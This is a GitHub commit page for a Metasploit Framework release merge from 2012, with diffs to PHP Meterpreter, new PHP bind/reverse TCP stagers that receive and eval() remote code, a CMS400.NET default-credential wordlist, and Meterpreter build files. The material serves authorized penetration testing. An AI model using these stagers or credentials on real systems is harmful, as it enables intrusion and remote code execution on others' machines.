Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP
Browse files

Merge branch 'release/20120131000001' into stable

  • Loading branch information...
commit d70596ab44a81652ac4ad92d052f0fbdf6f4ff1d 2 parents 060115e + 77a9b36
Jenkins authored
Showing with 2,603 additions and 585 deletions.
  1. BIN  data/gui/msfgui.jar
  2. BIN  data/meterpreter/ext_server_networkpug.lso
  3. BIN  data/meterpreter/ext_server_sniffer.lso
  4. BIN  data/meterpreter/ext_server_stdapi.lso
  5. +17 −9 data/meterpreter/meterpreter.php
  6. BIN  data/meterpreter/msflinker_linux_x86.bin
  7. +53 −0 data/php/bind_tcp_ipv6.php
  8. +4 −1 data/php/reverse_tcp.php
  9. +32 −10 data/post/enum_artifacts_list.txt
  10. +9 −0 data/sql/migrate/20120126110000_add_virtual_host_to_hosts.rb
  11. +14 −0 data/wordlists/cms400net_default_userpass.txt
  12. +12 −0 external/source/gui/msfguijava/src/msfgui/PayloadPopup.java
  13. +3 −3 external/source/gui/msfguijava/src/msfgui/RpcConnection.java
  14. +29 −6 external/source/meterpreter/Makefile
  15. +5 −1 external/source/meterpreter/source/bionic/libc/Android.mk
  16. +1 −1  external/source/meterpreter/source/bionic/libc/Jamfile
  17. +2 −2 external/source/meterpreter/source/bionic/libc/out/x86/make.sh
  18. +1 −1  external/source/meterpreter/source/bionic/libdl/Makefile
  19. +1 −0  external/source/meterpreter/source/bionic/libm/msfMakefile
  20. +2 −2 external/source/meterpreter/source/extensions/stdapi/server/fs/dir.c
  21. +2 −2 external/source/meterpreter/source/extensions/stdapi/server/fs/file.c
  22. +29 −0 external/source/meterpreter/source/extensions/stdapi/server/fs/fs.h
  23. +29 −1 external/source/meterpreter/source/extensions/stdapi/server/fs/fs_util.c
  24. +28 −9 external/source/meterpreter/source/openssl/build.sh
  25. +6 −5 external/source/meterpreter/source/server/rtld/Makefile
  26. +2 −2 external/source/meterpreter/source/server/rtld/elf2bin.c
  27. +4 −4 external/source/meterpreter/source/server/rtld/linker_debug.h
  28. +1 −1  external/source/meterpreter/workspace/Makefile
  29. +1 −1  external/source/meterpreter/workspace/common/Makefile
  30. +1 −1  external/source/meterpreter/workspace/ext_posix_sample/Makefile
  31. +1 −1  external/source/meterpreter/workspace/ext_server_networkpug/Makefile
  32. +1 −1  external/source/meterpreter/workspace/ext_server_sniffer/Makefile
  33. +1 −1  external/source/meterpreter/workspace/ext_server_stdapi/Makefile
  34. +1 −1  external/source/meterpreter/workspace/metsrv/Makefile
  35. +1 −1  lib/msf/core/auxiliary/report.rb
  36. +1 −0  lib/msf/core/db.rb
  37. +2 −1  lib/msf/core/exploit/http/client.rb
  38. +10 −2 lib/msf/core/exploit/http/server.rb
  39. +12 −1 lib/msf/core/exploit/postgres.rb
  40. +4 −0 lib/msf/core/model/host.rb
  41. +12 −0 lib/msf/core/post/common.rb
  42. +16 −4 lib/msf/core/post/file.rb
  43. +5 −0 lib/msf/core/rpc/v10/rpc_module.rb
  44. +21 −10 lib/msf/ui/console/command_dispatcher/core.rb
  45. +1 −1  lib/postgres/postgres-pr/connection.rb
  46. +1 −1  modules/auxiliary/admin/natpmp/natpmp_map.rb
  47. +8 −3 modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb
  48. +59 −54 modules/auxiliary/bnat/bnat_scan.rb
  49. +2 −2 modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb
  50. +1 −1  modules/auxiliary/gather/natpmp_external_address.rb
  51. +108 −10 modules/auxiliary/scanner/discovery/udp_probe.rb
  52. +114 −8 modules/auxiliary/scanner/discovery/udp_sweep.rb
  53. +161 −0 modules/auxiliary/scanner/http/ektron_cms400net.rb
  54. +1 −1  modules/auxiliary/scanner/http/tomcat_enum.rb
  55. +1 −62 modules/auxiliary/scanner/mssql/mssql_hashdump.rb
  56. +2 −48 modules/auxiliary/scanner/mysql/mysql_hashdump.rb
  57. +1 −1  modules/auxiliary/scanner/natpmp/natpmp_portscan.rb
  58. +1 −37 modules/auxiliary/scanner/oracle/oracle_hashdump.rb
  59. +1 −1  modules/auxiliary/scanner/oracle/xdb_sid.rb
  60. +1 −1  modules/auxiliary/scanner/oracle/xdb_sid_brute.rb
  61. +66 −0 modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb
  62. +174 −0 modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb
  63. +1 −1  modules/auxiliary/scanner/postgres/postgres_hashdump.rb
  64. +2 −2 modules/auxiliary/scanner/postgres/postgres_version.rb
  65. +1 −1  modules/auxiliary/scanner/snmp/snmp_login.rb
  66. +7 −1 modules/auxiliary/scanner/vmware/vmauthd_login.rb
  67. +94 −0 modules/auxiliary/scanner/vmware/vmware_http_login.rb
  68. +1 −1  modules/auxiliary/server/tftp.rb
  69. +13 −18 modules/auxiliary/spoof/arp/arp_poisoning.rb
  70. +1 −1  modules/exploits/linux/telnet/telnet_encrypt_keyid.rb
  71. +100 −0 modules/exploits/multi/http/vbseo_proc_deutf.rb
  72. +1 −1  modules/exploits/osx/browser/mozilla_mchannel.rb
  73. +1 −1  modules/exploits/windows/browser/mozilla_mchannel.rb
  74. +469 −0 modules/exploits/windows/browser/ms12_004_midi.rb
  75. +1 −1  modules/exploits/windows/browser/teechart_pro.rb
  76. +3 −3 modules/exploits/windows/browser/vlc_amv.rb
  77. +74 −0 modules/exploits/windows/misc/hp_magentservice.rb
  78. +53 −0 modules/payloads/singles/osx/x64/exec.rb
  79. +61 −0 modules/payloads/singles/php/bind_perl_ipv6.rb
  80. +92 −0 modules/payloads/singles/php/bind_php_ipv6.rb
  81. +0 −1  modules/payloads/singles/php/meterpreter_reverse_tcp.rb
  82. +4 −3 modules/payloads/singles/php/reverse_perl.rb
  83. +13 −5 modules/payloads/singles/php/reverse_php.rb
  84. +54 −0 modules/payloads/stagers/php/bind_tcp_ipv6.rb
  85. +2 −3 modules/post/linux/gather/checkvm.rb
  86. +64 −0 modules/post/multi/gather/enum_vbox.rb
  87. +138 −0 modules/post/multi/gather/find_vmx.rb
  88. +11 −2 modules/post/multi/gather/pidgin_cred.rb
  89. +36 −18 modules/post/windows/gather/checkvm.rb
  90. +1 −1  modules/post/windows/gather/credentials/filezilla_server.rb
  91. +2 −2 modules/post/windows/gather/credentials/imail.rb
  92. +1 −1  modules/post/windows/gather/credentials/imvu.rb
  93. +1 −1  modules/post/windows/gather/credentials/nimbuzz.rb
  94. +3 −2 modules/post/windows/gather/dumplinks.rb
  95. +45 −41 modules/post/windows/gather/enum_artifacts.rb
  96. +2 −2 modules/post/windows/gather/enum_devices.rb
  97. +3 −0  msfvenom
  98. +12 −12 tools/msftidy.rb
  99. +157 −144 tools/reg.rb
BIN  data/gui/msfgui.jar
View
Binary file not shown
BIN  data/meterpreter/ext_server_networkpug.lso
View
Binary file not shown
BIN  data/meterpreter/ext_server_sniffer.lso
View
Binary file not shown
BIN  data/meterpreter/ext_server_stdapi.lso
View
Binary file not shown
26 data/meterpreter/meterpreter.php
View
@@ -730,6 +730,17 @@ function register_stream($stream, $ipaddr=null, $port=null) {
function connect($ipaddr, $port, $proto='tcp') {
my_print("Doing connect($ipaddr, $port)");
$sock = false;
+
+ # IPv6 requires brackets around the address in some cases, but not all.
+ # Keep track of the un-bracketed address for the functions that don't like
+ # brackets, specifically socket_connect and socket_sendto.
+ $ipf = AF_INET;
+ $raw_ip = $ipaddr;
+ if (FALSE !== strpos($ipaddr, ":")) {
+ $ipf = AF_INET6;
+ $ipaddr = "[". $raw_ip ."]";
+ }
+
# Prefer the stream versions so we don't have to use both select functions
# unnecessarily, but fall back to socket_create if they aren't available.
if (is_callable('stream_socket_client')) {
@@ -759,16 +770,17 @@ function connect($ipaddr, $port, $proto='tcp') {
if (!$sock) { return false; }
register_stream($sock, $ipaddr, $port);
}
- } elseif (is_callable('socket_create')) {
+ } else
+ if (is_callable('socket_create')) {
my_print("socket_create");
if ($proto == 'tcp') {
- $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
- $res = socket_connect($sock, $ipaddr, $port);
+ $sock = socket_create($ipf, SOCK_STREAM, SOL_TCP);
+ $res = socket_connect($sock, $raw_ip, $port);
if (!$res) { return false; }
register_socket($sock);
} elseif ($proto == 'udp') {
- $sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
- register_socket($sock, $ipaddr, $port);
+ $sock = socket_create($ipf, SOCK_DGRAM, SOL_UDP);
+ register_socket($sock, $raw_ip, $port);
}
}
@@ -1066,10 +1078,6 @@ function remove_reader($resource) {
$ipaddr = '127.0.0.1';
$port = 4444;
my_print("Don't have a msgsock, trying to connect($ipaddr, $port)");
- if (FALSE !== strpos($ipaddr,":")) {
- # ipv6 requires brackets around the address
- $ipaddr = "[".$ipaddr."]";
- }
$msgsock = connect($ipaddr, $port);
if (!$msgsock) { die(); }
} else {
BIN  data/meterpreter/msflinker_linux_x86.bin
View
Binary file not shown
53 data/php/bind_tcp_ipv6.php
View
@@ -0,0 +1,53 @@
+#<?php
+
+# The payload handler overwrites this with the correct LPORT before sending
+# it to the victim.
+$port = 4444;
+$ipaddr = "::";
+
+if (is_callable('stream_socket_server')) {
+ $srvsock = stream_socket_server("tcp://[{$ipaddr}]:{$port}");
+ if (!$srvsock) { die(); }
+ $s = stream_socket_accept($srvsock, -1);
+ $s_type = 'stream';
+} elseif (is_callable('socket_create_listen')) {
+ $srvsock = socket_create_listen(AF_INET6, SOCK_STREAM, SOL_TCP);
+ if (!$res) { die(); }
+ $s = socket_accept($srvsock);
+ $s_type = 'socket';
+} elseif (is_callable('socket_create')) {
+ $srvsock = socket_create(AF_INET6, SOCK_STREAM, SOL_TCP);
+ $res = socket_bind($srvsock, $ipaddr, $port);
+ if (!$res) { die(); }
+ $s = socket_accept($srvsock);
+ $s_type = 'socket';
+} else {
+ die();
+}
+if (!$s) { die(); }
+
+switch ($s_type) {
+case 'stream': $len = fread($s, 4); break;
+case 'socket': $len = socket_read($s, 4); break;
+}
+if (!$len) {
+ # We failed on the main socket. There's no way to continue, so
+ # bail
+ die();
+}
+$a = unpack("Nlen", $len);
+$len = $a['len'];
+
+$b = '';
+while (strlen($b) < $len) {
+ switch ($s_type) {
+ case 'stream': $b .= fread($s, $len-strlen($b)); break;
+ case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
+ }
+}
+
+# Set up the socket for the main stage to use.
+$GLOBALS['msgsock'] = $s;
+$GLOBALS['msgsock_type'] = $s_type;
+eval($b);
+die();
5 data/php/reverse_tcp.php
View
@@ -5,9 +5,12 @@
# it to the victim.
$ip = '127.0.0.1';
$port = 4444;
+$ipf = AF_INET;
+
if (FALSE !== strpos($ip, ":")) {
# ipv6 requires brackets around the address
$ip = "[". $ip ."]";
+ $ipf = AF_INET6;
}
if (($f = 'stream_socket_client') && is_callable($f)) {
@@ -17,7 +20,7 @@
$s = $f($ip, $port);
$s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
- $s = $f(AF_INET, SOCK_STREAM, SOL_TCP);
+ $s = $f($ipf, SOCK_STREAM, SOL_TCP);
$res = @socket_connect($s, $ip, $port);
if (!$res) { die(); }
$s_type = 'socket';
42 data/post/enum_artifacts_list.txt
View
@@ -1,14 +1,36 @@
-# This file contains a list of artifacts used by the enum_artifacts post module
-# Artifacts should be listed one per line and use the following formats:
-# File entries
-# file|path/to/file|md5sum
+# YAML:1.0
+# Configuration file for enum_artifacts.rb module
+# This file contains a YAML formated list of artifacts used by the
+# enum_artifacts post module. Artifacts should be listed using the following
+# format:
#
-# Registry entries
-# reg|hive|key|value
+# ---
+# malware_name:
+# files:
+# - name: path\to\file
+# csum: 00112233445566778899aabbccddeeff
+# - name: path\to\another\file
+# csum: 112233445566778899aabbccddeeff00
+#
+# reg_entries:
+# - key: registry_key
+# val: registry_value
+# data: data
#
# Happy hunting
+---
+test_evidence:
+ files:
+ - name: c:\ntdetect.comx
+ csum: b2de3452de03674c6cec68b8c8ce7c78
+ - name: c:\boot.ini
+ csum: fa579938b0733b87066546afe951082c
+
+ reg_entries:
+ - key: HKEY_LOCAL_MACHINE\SYSTEM\Selectx
+ val: Current
+ data: 1
+ - key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ACPI
+ val: DisplayName
+ data: Microsoft ACPI Driver
-file|c:\ntdetect.com|b2de3452de03674c6cec68b8c8ce7c78
-file|c:\boot.ini|fa579938b0733b87066546afe951082c
-reg|HKEY_LOCAL_MACHINE\SYSTEM\Select|Current|1
-reg|HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ACPI|DisplayName|Microsoft ACPI Driver
9 data/sql/migrate/20120126110000_add_virtual_host_to_hosts.rb
View
@@ -0,0 +1,9 @@
+class AddVirtualHostToHosts < ActiveRecord::Migration
+ def self.up
+ add_column :hosts, :virtual_host, :text
+ end
+
+ def self.down
+ remove_column :hosts, :viritual_host
+ end
+end
14 data/wordlists/cms400net_default_userpass.txt
View
@@ -0,0 +1,14 @@
+admin admin
+builtin builtin
+jedit jedit
+jmember jmember
+Admin2 Admin2
+tbrown tbrown
+jsmith jsmith
+vs vs
+EkExplorerUser EkExplorerUser
+Explorer Explorer
+member@example.com member@example.com
+north north
+supermember supermember
+west west
12 external/source/gui/msfguijava/src/msfgui/PayloadPopup.java
View
@@ -46,6 +46,18 @@ public PayloadPopup(String fullName, RpcConnection rpcConn, MainFrame frame) {
encoderCombo.setSelectedIndex(defaultEncoder);
}catch(MsfException xre){
}
+ //get formats
+ try{
+ Object[] formats = ((List)rpcConn.execute("module.encode_formats")).toArray();
+ int defaultFormat = 0;
+ for(int i = 0; i < formats.length; i++)
+ if(formats[i].toString().equals("exe"))
+ defaultFormat = i;
+ outputCombo.setModel(new DefaultComboBoxModel(formats));
+ outputCombo.setSelectedIndex(defaultFormat);
+ }catch(MsfException xre){
+ xre.printStackTrace();
+ }
mainScrollPane.getVerticalScrollBar().setUnitIncrement(40);
}
6 external/source/gui/msfguijava/src/msfgui/RpcConnection.java
View
@@ -84,7 +84,7 @@ public void setup(String username, char[] password, String host, int port, boole
String message = "";
try {
connect();
- Map results = exec("auth.login",new Object[]{username, this.password});
+ Map results = (Map)exec("auth.login",new Object[]{username, this.password});
rpcToken=results.get("token").toString();
haveRpcd=results.get("result").equals("success");
} catch (MsfException xre) {
@@ -211,11 +211,11 @@ private Object cacheExecute(String methodName, Object[] params) throws MsfExcept
}
/** Method that handles synchronization and error handling for calls */
- private Map exec (String methname, Object[] params) throws MsfException{
+ private Object exec (String methname, Object[] params) throws MsfException{
synchronized(lockObject){ //Only one method call at a time!
try{
writeCall(methname, params);
- return (Map)readResp();
+ return readResp();
}catch(Exception ex){ //any weirdness gets wrapped in a MsfException
try{
if(ex instanceof java.net.SocketTimeoutException)
35 external/source/meterpreter/Makefile
View
@@ -40,11 +40,25 @@ external/source/meterpreter/source/bionic/compiled/libcrypto.so: tmp/openssl-0.9
external/source/meterpreter/source/bionic/compiled/libssl.so: tmp/openssl-0.9.8o/libssl.so
cp tmp/openssl-0.9.8o/libssl.so external/source/meterpreter/source/bionic/compiled/libssl.so
+LIBC=$(PWD)/external/source/meterpreter/source/bionic/libc
+LIBM=$(PWD)/external/source/meterpreter/source/bionic/libm
+COMPILED=$(PWD)/external/source/meterpreter/source/bionic/compiled
+MSF_CFLAGS=-Os -Wl,--hash-style=sysv -march=i386 -m32 -nostdinc -nostdlib -fno-builtin -fpic -I $(LIBC)/include -I $(LIBC)/kernel/common/linux/ -I $(LIBC)/kernel/common/ -I $(LIBC)/arch-x86/include/ -I $(LIBC)/kernel/arch-x86/ -I$(LIBC)/private -I$(LIBM)/include -DPIC -Dwchar_t='char' -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -D_BYTE_ORDER=_LITTLE_ENDIAN -L$(COMPILED) -lc
+
tmp/openssl-0.9.8o/libssl.so:
[ -d tmp ] || mkdir tmp
- [ -d tmp/openssl-0.9.8o ] || wget -O tmp/openssl-0.9.8o.tar.gz http://openssl.org/source/openssl-0.9.8o.tar.gz && tar -C tmp/ -xzf tmp/openssl-0.9.8o.tar.gz
- (cd tmp/openssl-0.9.8o && ./Configure threads no-zlib no-krb5 386 --prefix=/tmp/out linux-elf shared)
- (cd tmp/openssl-0.9.8o && make CC="gcc -Os -Wl,--hash-style=sysv -I${PWD}/external/source/meterpreter/source/bionic/libc/include -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/linux/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/ -I${PWD}/external/source/meterpreter/source/bionic/libc/arch-x86/include/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/arch-x86/ -I${PWD}/external/source/meterpreter/source/bionic/libc/private -fPIC -DPIC -nostdinc -nostdlib -Dwchar_t='char' -fno-builtin -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -I${PWD}/external/source/meterpreter/source/bionic/libm/include -L${PWD}/external/source/meterpreter/source/bionic/compiled -D_BYTE_ORDER=_LITTLE_ENDIAN -lc" depend all ; [ -f libssl.so.0.9.8 -a -f libcrypto.so.0.9.8 ] )
+ [ -d tmp/openssl-0.9.8o ] || wget -O tmp/openssl-0.9.8o.tar.gz http://openssl.org/source/openssl-0.9.8o.tar.gz
+ [ -f tmp/openssl-0.9.8o/Configure ] || tar -C tmp/ -xzf tmp/openssl-0.9.8o.tar.gz
+ (cd tmp/openssl-0.9.8o && \
+ cat Configure | grep -v 'linux-msf' | \
+ sed -e 's#my %table=(#my %table=( \
+ "linux-msf", "gcc:$(MSF_CFLAGS) -DL_ENDIAN -DTERMIO -Wall::$(MSF_CFLAGS) -D_REENTRANT::$(MSF_CFLAGS) -ldl:BN_LLONG $${x86_gcc_des} $${x86_gcc_opts}:$${x86_elf_asm}:dlfcn:linux-shared:$(MSF_CFLAGS) -fPIC::.so.\\$$\\$$(SHLIB_MAJOR).\\$$\\$$(SHLIB_MINOR)",\
+ #;' > Configure-msf;\
+ cp Configure-msf Configure && chmod +x Configure && \
+ grep linux-msf Configure && \
+ ./Configure --prefix=/tmp/out threads shared no-hw no-dlfcn no-zlib no-krb5 no-idea 386 linux-msf \
+ )
+ (cd tmp/openssl-0.9.8o && make CC="gcc -march=i386 -m32 -Os -Wl,--hash-style=sysv -I${PWD}/external/source/meterpreter/source/bionic/libc/include -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/linux/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/ -I${PWD}/external/source/meterpreter/source/bionic/libc/arch-x86/include/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/arch-x86/ -I${PWD}/external/source/meterpreter/source/bionic/libc/private -fPIC -DPIC -nostdinc -nostdlib -Dwchar_t='char' -fno-builtin -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -I${PWD}/external/source/meterpreter/source/bionic/libm/include -L${PWD}/external/source/meterpreter/source/bionic/compiled -D_BYTE_ORDER=_LITTLE_ENDIAN -lc" depend all ; [ -f libssl.so.0.9.8 -a -f libcrypto.so.0.9.8 ] )
cp tmp/openssl-0.9.8o/libssl.so* tmp/openssl-0.9.8o/libcrypto.so* external/source/meterpreter/source/openssl/lib/linux/i386/
external/source/meterpreter/source/bionic/compiled/libpcap.so: tmp/libpcap-1.1.1/libpcap.so.1.1.1
@@ -53,7 +67,7 @@ external/source/meterpreter/source/bionic/compiled/libpcap.so: tmp/libpcap-1.1.1
tmp/libpcap-1.1.1/libpcap.so.1.1.1:
[ -d tmp ] || mkdir tmp
[ -f tmp/libpcap-1.1.1.tar.gz ] || wget -O tmp/libpcap-1.1.1.tar.gz http://www.tcpdump.org/release/libpcap-1.1.1.tar.gz
- tar -C tmp -xzf tmp/libpcap-1.1.1.tar.gz
+ [ -f tmp/libpcap-1.1.1/configure ] || tar -C tmp -xzf tmp/libpcap-1.1.1.tar.gz
(cd tmp/libpcap-1.1.1 && ./configure --disable-bluetooth --without-bluetooth --without-usb --disable-usb --without-can --disable-can --without-usb-linux --disable-usb-linux)
echo '#undef HAVE_DECL_ETHER_HOSTTON' >> tmp/libpcap-1.1.1/config.h
echo '#undef HAVE_SYS_BITYPES_H' >> tmp/libpcap-1.1.1/config.h
@@ -63,7 +77,7 @@ tmp/libpcap-1.1.1/libpcap.so.1.1.1:
echo '#define _STDLIB_H this_works_around_malloc_definition_in_grammar_dot_c' >> tmp/libpcap-1.1.1/config.h
(cd tmp/libpcap-1.1.1 && patch --dry-run -p0 < ../../external/source/meterpreter/source/libpcap/pcap_nametoaddr_fix.diff && patch -p0 < ../../external/source/meterpreter/source/libpcap/pcap_nametoaddr_fix.diff)
sed -i -e s/pcap-usb-linux.c//g -e s/fad-getad.c/fad-gifc.c/g tmp/libpcap-1.1.1/Makefile
- sed -i -e s^"CC = gcc"^"CC = gcc -Wl,--hash-style=sysv -fno-stack-protector -nostdinc -nostdlib -fPIC -DPIC -g -Wall -D_UNIX -D__linux__ -I${PWD}/external/source/meterpreter/source/bionic/libc/include -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/linux/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/ -I${PWD}/external/source/meterpreter/source/bionic/libc/arch-x86/include/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/arch-x86/ -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t" -D_BYTE_ORDER=_LITTLE_ENDIAN -lgcc -L${PWD}/external/source/meterpreter/source/bionic/compiled -gstabs+ -fPIC -Os -lc"^g tmp/libpcap-1.1.1/Makefile
+ sed -i -e s^"CC = gcc"^"CC = gcc -march=i386 -m32 -Wl,--hash-style=sysv -fno-stack-protector -nostdinc -nostdlib -fPIC -DPIC -g -Wall -D_UNIX -D__linux__ -I${PWD}/external/source/meterpreter/source/bionic/libc/include -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/linux/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/ -I${PWD}/external/source/meterpreter/source/bionic/libc/arch-x86/include/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/arch-x86/ -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t" -D_BYTE_ORDER=_LITTLE_ENDIAN -lgcc -L${PWD}/external/source/meterpreter/source/bionic/compiled -gstabs+ -fPIC -Os -lc"^g tmp/libpcap-1.1.1/Makefile
(cd tmp/libpcap-1.1.1 && make)
@@ -108,10 +122,19 @@ data/meterpreter/ext_server_networkpug.lso: $(workspace)/ext_server_networkpug/e
clean:
rm -f $(objects)
rm -f external/source/meterpreter/source/bionic/lib*/*.o
+ find external/source/meterpreter/source/bionic/ -name '*.a' -print0 | xargs -0 rm -f 2>/dev/null
rm -f external/source/meterpreter/source/bionic/lib*/*.so
(cd external/source/meterpreter/source/server/rtld/ && make clean)
(cd $(workspace) && make clean)
+clean-pcap:
+ (cd tmp/libpcap-1.1.1/ && make clean)
+
+clean-ssl:
+ (cd tmp/openssl-0.9.8o/ && make clean)
+
+really-clean: clean clean-ssl clean-pcap
+
-.PHONY: clean
+.PHONY: clean clean-ssl clean-pcap really-clean
6 external/source/meterpreter/source/bionic/libc/Android.mk
View
@@ -443,7 +443,11 @@ else # !arm
# Enable recent IA friendly memory routines (such as for Atom)
# These will not work on the earlier x86 machines
- libc_common_cflags += -mtune=i686 -DUSE_SSSE3 -DUSE_SSE2
+ #libc_common_cflags += -mtune=i686 -DUSE_SSSE3 -DUSE_SSE2
+
+ # egypt: compile for 386 so meterpreter will have a chance of working on
+ # older processors
+ libc_common_cflags += -march=i386
endif # x86
endif # !arm
2  external/source/meterpreter/source/bionic/libc/Jamfile
View
@@ -377,7 +377,7 @@ DEFINES = USE_LOCKS
ANDROID
;
-CFLAGS_x86 = -Iprivate -Ibionic -Ikernel/arch-x86 -Ikernel/common -I../libm/include -fno-stack-protector -fno-pie -DPIC -ffreestanding -fno-tree-scev-cprop ;
+CFLAGS_x86 = -m32 -march=i386 -Iprivate -Ibionic -Ikernel/arch-x86 -Ikernel/common -I../libm/include -fno-stack-protector -fno-pie -DPIC -ffreestanding -fno-tree-scev-cprop ;
for arch in $(ARCH)
4 external/source/meterpreter/source/bionic/libc/out/x86/make.sh 100644 → 100755
View
@@ -11,10 +11,10 @@ for i in $BAD_FILES ; do
rm flood/$i >/dev/null
done
-gcc -Wl,--hash-style=sysv -nostdinc -nostdlib -shared -o libbionic.so flood/*.o -lgcc
+gcc -Wl,--hash-style=sysv -nostdinc -nostdlib -shared -o libbionic.so flood/*.o -lgcc -march=i386 -m32
[ ! -f libc.so ] && ln -s ${PWD}/libbionic.so libc.so
rm -rf flood >/dev/null
-
+exit 0
2  external/source/meterpreter/source/bionic/libdl/Makefile
View
@@ -3,7 +3,7 @@ CFLAGS+= -I../libc/include -I../libc/private -I../libc/bionic -I../libc/kernel/a
CFLAGS+= -I../libc/kernel/common/linux/ -I../libc/arch-x86/include/ -I../libc/kernel/common/
CFLAGS+= -Os
-CFLAGS+= -march=i386
+CFLAGS+= -march=i386 -m32
all:
gcc -Wl,--hash-style=sysv -shared -o libdl.so $(CFLAGS) libdl.c
1  external/source/meterpreter/source/bionic/libm/msfMakefile
View
@@ -10,6 +10,7 @@ CFLAGS+=-I../libc/kernel/common/ -I../libc/arch-${TARGET_ARCH}/include/ -I../lib
CFLAGS+=-D_BYTE_ORDER=_LITTLE_ENDIAN -Ihack/ -I${TARGET_FPU} -I../libc/arch-${TARGET_ARCH}/include
CFLAGS+=-fPIC -DPIC
CFLAGS+=-Wl,--hash-style=sysv
+CFLAGS+=-march=i386 -m32
libm_common_src_files= \
isinf.c \
4 external/source/meterpreter/source/extensions/stdapi/server/fs/dir.c
View
@@ -21,7 +21,7 @@ DWORD request_fs_ls(Remote *remote, Packet *packet)
LPSTR expanded = NULL, tempFile = NULL;
DWORD tempFileSize = 0;
LPSTR baseDirectory = NULL;
- struct stat buf;
+ struct meterp_stat buf;
directory = packet_get_tlv_value_string(packet, TLV_TYPE_DIRECTORY_PATH);
@@ -150,7 +150,7 @@ DWORD request_fs_ls(Remote *remote, Packet *packet)
tempFile);
// Stat the file to get more information about it.
- if (stat(tempFile, &buf) >= 0)
+ if (fs_stat(tempFile, &buf) >= 0)
packet_add_tlv_raw(response, TLV_TYPE_STAT_BUF, &buf,
sizeof(buf));
4 external/source/meterpreter/source/extensions/stdapi/server/fs/file.c
View
@@ -257,7 +257,7 @@ DWORD request_fs_separator(Remote *remote, Packet *packet)
DWORD request_fs_stat(Remote *remote, Packet *packet)
{
Packet *response = packet_create_response(packet);
- struct stat buf;
+ struct meterp_stat buf;
LPCSTR filePath;
LPSTR expanded = NULL;
DWORD result = ERROR_SUCCESS;
@@ -273,7 +273,7 @@ DWORD request_fs_stat(Remote *remote, Packet *packet)
{
// Stat the file using the Microsoft stat wrapper so that we don't have to
// do translations
- if (stat(expanded, &buf) < 0)
+ if (fs_stat(expanded, &buf) < 0)
result = GetLastError();
else
packet_add_tlv_raw(response, TLV_TYPE_STAT_BUF, &buf,
29 external/source/meterpreter/source/extensions/stdapi/server/fs/fs.h
View
@@ -24,4 +24,33 @@ DWORD request_fs_sha1(Remote *remote, Packet *packet);
*/
DWORD request_fs_file_channel_open(Remote *remote, Packet *packet);
+
+
+/*
+ * Stat structures on Windows and various Unixes are all slightly different.
+ * Use this as a means of standardization so the client has some hope of
+ * understanding what the stat'd file really is.
+ */
+struct meterp_stat {
+ unsigned int st_dev;
+ unsigned short st_ino;
+ unsigned short st_mode;
+ unsigned short st_nlink;
+ unsigned short st_uid;
+ unsigned short st_gid;
+ unsigned short pad;
+ unsigned int st_rdev;
+ unsigned int st_size;
+ /*
+ * These are always 64-bits on Windows and usually 32-bits on Linux. Force
+ * them to be the same size everywhere.
+ */
+ unsigned long long st_atime;
+ unsigned long long st_mtime;
+ unsigned long long st_ctime;
+};
+
+int fs_stat(LPCSTR filename, struct meterp_stat *buf);
+
+
#endif
30 external/source/meterpreter/source/extensions/stdapi/server/fs/fs_util.c
View
@@ -1,4 +1,5 @@
#include "precomp.h"
+#include "fs.h"
/*
* Returns an expanded file path that must be freed
@@ -37,4 +38,31 @@ LPSTR fs_expand_path(LPCSTR regular)
strcpy(expandedFilePath, regular);
return expandedFilePath;
#endif
-}
+}
+
+/*
+ * Fills the platform-independent meterp_stat buf with data from the platform-dependent stat()
+ */
+int fs_stat(LPCSTR filename, struct meterp_stat *buf) {
+ struct stat sbuf;
+ int ret;
+
+ ret = stat(filename, &sbuf);
+
+ if (ret == 0) {
+ buf->st_dev = sbuf.st_dev;
+ buf->st_ino = sbuf.st_ino;
+ buf->st_mode = sbuf.st_mode;
+ buf->st_nlink = sbuf.st_nlink;
+ buf->st_uid = sbuf.st_uid;
+ buf->st_gid = sbuf.st_gid;
+ buf->st_rdev = sbuf.st_rdev;
+ buf->st_size = sbuf.st_size;
+ buf->st_atime = (unsigned long long)sbuf.st_atime;
+ buf->st_mtime = (unsigned long long)sbuf.st_mtime;
+ buf->st_ctime = (unsigned long long)sbuf.st_ctime;
+ return 0;
+ } else {
+ return ret;
+ }
+}
37 external/source/meterpreter/source/openssl/build.sh
View
@@ -1,15 +1,34 @@
#!/bin/sh
-OSSL=openssl-0.9.8o
+set -e
-pushd $OSSL
-./Configure threads no-zlib no-krb5 386 --prefix=/tmp/out linux-msf no-dlfcn shared
-popd
+#OSSL=openssl-0.9.8o
+OSSL=openssl-0.9.8n
-export LIBC=../../bionic/libc
-export LIBM=../../bionic/libm
-export COMPILED=../../bionic/compiled
+cd $OSSL
+
+cat Configure | grep -v 'linux-msf' | sed -e 's#my %table=(#my %table=(\
